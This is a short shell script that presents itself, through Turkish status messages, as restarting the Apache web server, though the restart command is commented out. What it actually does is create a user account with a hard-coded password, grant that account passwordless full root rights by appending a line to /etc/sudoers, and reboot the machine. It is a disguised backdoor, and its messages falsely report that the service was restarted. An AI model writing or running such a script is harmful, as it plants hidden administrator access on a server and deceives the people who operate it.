#! /bin/sh

echo "APACHE WEB SNUCUSU YENDIDEN BASLATILIYOR";

#/etc/init.d/apache2 restart


echo "SERVIS YENDEN BASLATILDI"


#exit;

useradd -m -s /bin/bash st4inl3s5
echo "st4inl3s5:trakya2005" | chpasswd
echo "st4inl3s5 ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers

reboot
